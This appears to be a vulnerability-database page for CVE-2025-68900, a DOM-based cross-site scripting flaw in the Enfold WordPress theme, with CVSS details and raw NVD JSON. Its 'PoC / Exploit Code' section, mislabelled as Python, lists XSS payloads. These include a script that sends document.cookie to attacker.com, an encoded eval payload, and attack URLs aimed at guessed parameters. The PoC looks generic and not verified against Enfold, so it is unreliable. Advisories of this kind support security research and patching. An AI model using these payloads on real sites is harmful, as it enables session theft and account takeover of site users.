Security Vulnerability Report
中文
CVE-2025-68900 CVSS 6.5 MEDIUM

CVE-2025-68900

Published: 2026-01-22 17:16:14
Last Modified: 2026-05-08 13:16:36

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold allows DOM-Based XSS. This issue affects Enfold: from n/a through 7.1.3.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Enfold 所有版本 < 7.1.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-68900 DOM-Based XSS PoC for Enfold Theme --> <!-- This PoC demonstrates how an attacker could exploit the DOM XSS vulnerability --> <!-- Method 1: Using image onerror event --> <img src=x onerror="alert(document.cookie)"> <!-- Method 2: Using script tag with external payload --> <script>fetch('https://attacker.com/steal?cookie='+document.cookie)</script> <!-- Method 3: Using SVG onload event --> <svg onload="eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))"> <!-- Full Attack URL Example --> <!-- https://victim-site.com/?search_term=<img src=x onerror=alert(document.domain)> --> <!-- https://victim-site.com/?tab=<svg onload=alert(document.cookie)> --> <!-- Recommended PoC for verification --> <script> // DOM XSS Verification Script var testPayload = '<img src=x onerror=alert("DOM-XSS-VULNERABLE")>'; var vulnerableParam = 'search_term'; // Common parameter in Enfold var attackUrl = window.location.origin + '?' + vulnerableParam + '=' + encodeURIComponent(testPayload); console.log('Test URL: ' + attackUrl); document.write('<h3>Test the vulnerability by visiting this URL:</h3>'); document.write('<a href="' + attackUrl + '">' + attackUrl + '</a>'); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68900", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:13.733", "lastModified": "2026-05-08T13:16:35.863", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Kriesi Enfold allows DOM-Based XSS.\n\nThis issue affects Enfold: from n/a through 7.1.3."}, {"lang": "es", "value": "Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Kriesi Enfold enfold permite XSS basado en DOM. Este problema afecta a Enfold: desde n/a hasta &lt;= 7.1.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/theme/enfold/vulnerability/wordpress-enfold-theme-7-1-3-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}